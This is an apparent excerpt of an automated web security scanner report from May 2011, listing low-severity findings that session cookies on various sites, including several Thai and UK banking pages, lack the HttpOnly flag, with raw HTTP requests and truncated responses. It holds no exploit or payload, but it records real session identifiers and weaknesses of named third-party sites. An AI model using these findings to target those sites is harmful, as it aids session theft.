Host: www.independent.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:33:33 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Set-Cookie: JSESSIONID=0BE25EBF416370901D26EB60FF42CDDF; Path=/independentLondon
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 73917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.f
...[SNIP]...

16.60. http://www.khonkaen.com/english/forum/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.khonkaen.com
Path:   /english/forum/default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /english/forum/default.asp HTTP/1.1
Host: www.khonkaen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:35:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 56230
Content-Type: text/html
Expires: Sun, 01 May 2011 13:35:08 GMT
Set-Cookie: WWF9lVisit=LV=2011%2D05%2D03+09%3A35%3A08; expires=Thu, 03-May-2012 13:35:08 GMT; path=/english/forum/
Set-Cookie: WWF9sID=SID=f164d34f8z5551bee8bz1c9f5zddd61d; path=/english/forum/
Set-Cookie: ASPSESSIONIDAADRARSA=HLEDHHGDIEGBPGHDMNPDLMJJ; path=/
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...

16.61. http://www.khonkaen.com/english/forum/forum_posts.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.khonkaen.com
Path:   /english/forum/forum_posts.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /english/forum/forum_posts.asp HTTP/1.1
Host: www.khonkaen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Tue, 03 May 2011 13:35:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Location: default.asp
Content-Length: 132
Content-Type: text/html
Expires: Sun, 01 May 2011 13:35:04 GMT
Set-Cookie: WWF9lVisit=LV=2011%2D05%2D03+09%3A35%3A05; expires=Thu, 03-May-2012 13:35:04 GMT; path=/english/forum/
Set-Cookie: WWF9sID=SID=2b3f24aez7d292e218cc9ec5f9941ecd; path=/english/forum/
Set-Cookie: ASPSESSIONIDAADRARSA=NKEDHHGDOOEKAKFEAODLONEJ; path=/
Cache-control: No-Store

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="default.asp">here</a>.</body>

16.62. http://www.khonkaen.com/english/forum/forum_topics.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.khonkaen.com
Path:   /english/forum/forum_topics.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /english/forum/forum_topics.asp HTTP/1.1
Host: www.khonkaen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Tue, 03 May 2011 13:35:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Location: default.asp
Content-Length: 132
Content-Type: text/html
Expires: Sun, 01 May 2011 13:35:18 GMT
Set-Cookie: WWF9lVisit=LV=2011%2D05%2D03+09%3A35%3A18; expires=Thu, 03-May-2012 13:35:18 GMT; path=/english/forum/
Set-Cookie: WWF9sID=SID=1ed912f98556938badbff9548b74fbed; path=/english/forum/
Set-Cookie: ASPSESSIONIDAADRARSA=LPEDHHGDCIKNIKANOCGENPDF; path=/
Cache-control: No-Store

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="default.asp">here</a>.</body>

16.63. http://www.ktam.co.th/en/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ktam.co.th
Path:   /en/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/index.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/main/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:17 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Set-Cookie: PHPSESSID=d1cdc7e3a8eb0c5a4b6b250bbd07f90f; path=/
Connection: close
Content-Type: text/html
Content-Length: 29475

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...

16.64. http://www.ktb.co.th/en/main/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /en/main/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/main/ HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.google.com/url?sa=t&source=web&cd=1&ved=0CCUQFjAA&url=http%3A%2F%2Fwww.ktb.co.th%2Fen%2Fmain%2F&rct=j&q=Krung%20Thai%20Bank&ei=qeq_Tfr2CsOTtweWz5GlBQ&usg=AFQjCNEdcx3psLKqIE7sm2HW36Z3XFsh5Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:44:46 GMT
Content-type: text/html; charset=utf-8
Set-cookie: JSESSIONID=1C23CE5BF6D8DD1E66A9A9AACB11404A;Path=/
Content-Length: 21095


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="../../css/master.css" medi
...[SNIP]...

16.65. https://www.ktb.co.th/internetservice/onlineAccountAction.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.ktb.co.th
Path:   /internetservice/onlineAccountAction.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /internetservice/onlineAccountAction.do HTTP/1.1
Host: www.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _ctout6897=1; JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _uid6897=F468DC21.1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; _cbclose=1; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094; visit_time=440; _cbclose6897=1;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:38 GMT
Content-length: 4670
Content-type: text/html;charset=windows-874
X-powered-by: JSP/2.0
Set-cookie: JSESSIONID=b5ebc541426318ffffffffb76304a653d8574; Path=/internetservice
Connection: close
Set-Cookie: BIGipServerhttps.www.ktb.co.th=1163657482.47873.0000; path=/


<html>
<link href="css/style.css" rel="stylesheet" type="text/css">
<head>
<title>
KTB - Internet Service
</title>
<meta http-equiv="Content-Type" content="text/html; charset=w
...[SNIP]...

16.66. https://www.ktbonline.ktb.co.th/new/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.ktbonline.ktb.co.th
Path:   /new/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/ HTTP/1.1
Host: www.ktbonline.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 May 2011 12:53:42 GMT
Content-length: 0
Content-type: text/html;charset=UTF-8
Location: https://www.ktbonline.ktb.co.th/new/Login.do?cmd=init
Set-cookie: JSESSIONID=2C2724A2B9AD7734204AB10116B0FCBC; Path=/new; Secure
Set-cookie: JROUTE=jA2g; Path=/new; Secure
Connection: close


16.67. http://www.mindworkscorp.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mindworkscorp.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.mindworkscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=vt7j68qo3d3q8jfgfpr3ahhvp1; path=/
Content-Type: text/html
Content-Length: 6766


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <title>MindWorks. Corporate Training in Meditation and Stress Management</titl
...[SNIP]...

16.68. http://www.personal.barclays.co.uk/BRC1/jsp/brccontrol  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personal.barclays.co.uk
Path:   /BRC1/jsp/brccontrol

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BRC1/jsp/brccontrol HTTP/1.1
Host: www.personal.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:36:14 GMT
Set-Cookie: sesessionid=YDLZ1ALATYUE4BH4GVY4U0Q;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO8859-1
Content-Language: en
Content-type: text/html
Content-length: 2371
Connection: close

<!-- Vignette V/5 Tue May 03 14:36:14 2011 -->


                                                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<h
...[SNIP]...

16.69. http://www.scb.co.th/en/home  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.scb.co.th
Path:   /en/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/home HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Siam+Commercial+Bank
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:23:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=0flc3ca07u3lh2ij95rl4mm2l1; path=/
Expires: Wed, 03 Nov 2010 12:23:10 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13961

<!doctype html>
<html lang="th" class="no-js">
<head>
<meta charset="UTF-8">
<title>The Siam Commercial Bank : To be the Bank of Choice for our Customers, Shareholders, Empolyee and Community</ti
...[SNIP]...

16.70. http://www.scb.co.th/en/home/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.scb.co.th
Path:   /en/home/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/home/ HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/landing.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:33:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=8d1lr93egf7bhidm9atbjg9716; path=/
Expires: Wed, 03 Nov 2010 12:33:34 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13926

<!doctype html>
<html lang="th" class="no-js">
<head>
<meta charset="UTF-8">
<title>The Siam Commercial Bank : To be the Bank of Choice for our Customers, Shareholders, Empolyee and Community</ti
...[SNIP]...

16.71. http://www.scb.co.th/scb_api/scbapi.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.scb.co.th
Path:   /scb_api/scbapi.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scb_api/scbapi.jsp?key=MjAwOTEyMTUxNjA5NDM= HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 18:02:11 GMT
Server: Apache
Set-Cookie: JSESSIONID=DA225EB116BA7C9FF264A66EC445116D; Path=/scb_api
Connection: close
Content-Type: text/html;charset=tis-620
Content-Length: 10162


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

16.72. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cs70_banking/logon/sbuser HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.scbbusinessnet.com/

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:08 GMT
Server: IBM_HTTP_Server
Expires: 0
Set-Cookie: JSESSIONID=0000eYJXX4lFMzPC4DgxJ5qN74X:vd1tbof0;Path=/; Secure
Set-Cookie: affiliate=defaultAffiliate;Expires=Sun, 21-May-2079 15:58:16 GMT;Path=/cs70_banking
Cache-Control: no-store
Age: 3 Jun 2011 12:44:09 GMT
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 11710


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...

16.73. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/download

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs70_banking/logon/sbuser/download HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:47 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 15447


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...

16.74. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/information

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs70_banking/logon/sbuser/information HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:48 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 14996


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...

16.75. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/logon_th

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs70_banking/logon/sbuser/logon_th HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:50 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:50 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 11786


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...

16.76. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/securetip

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs70_banking/logon/sbuser/securetip HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:52 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:58 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 15786


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...

16.77. http://www.scbeasy.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.scbeasy.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.scbeasy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home/

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:43:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 264
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACBQSACT=OCBGOFPDPGCHHMOONBPIHAOI; path=/
Cache-control: private


                       <script>
                       var cT="t=o";
                       document.cookie=cT;
                       if(document.cookie.indexOf(cT)!=-1){
                       window.top.location.replace('https://www.scbeasy.com/1st_pg.html');
                       }else{
   
...[SNIP]...

16.78. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.scriptlogic.com
Path:   /sem/g/content/pt-wireless/070610

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sem/g/content/pt-wireless/070610?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534 HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:42:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless network strength monitor|formlessnetworking.com|C||7322411534
Set-Cookie: ASP.NET_SessionId=h20adracgrtmkruo5uvfe32b; path=/
Set-Cookie: Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; path=/
Set-Cookie: EntryPoint=/sem/g/content/pt-wireless/070610; domain=scriptlogic.com; expires=Thu, 03-May-2012 13:42:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 282

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless network stren
...[SNIP]...

16.79. http://www.set.or.th/set/oppdaybyperiod.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/oppdaybyperiod.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set/oppdaybyperiod.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=884D2D7AB4DAC6D78614FFFB7A7D8586; Path=/set
Content-Length: 118042


<html>
<head>
<link href="/set/styles/setstyle.css;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" t
...[SNIP]...

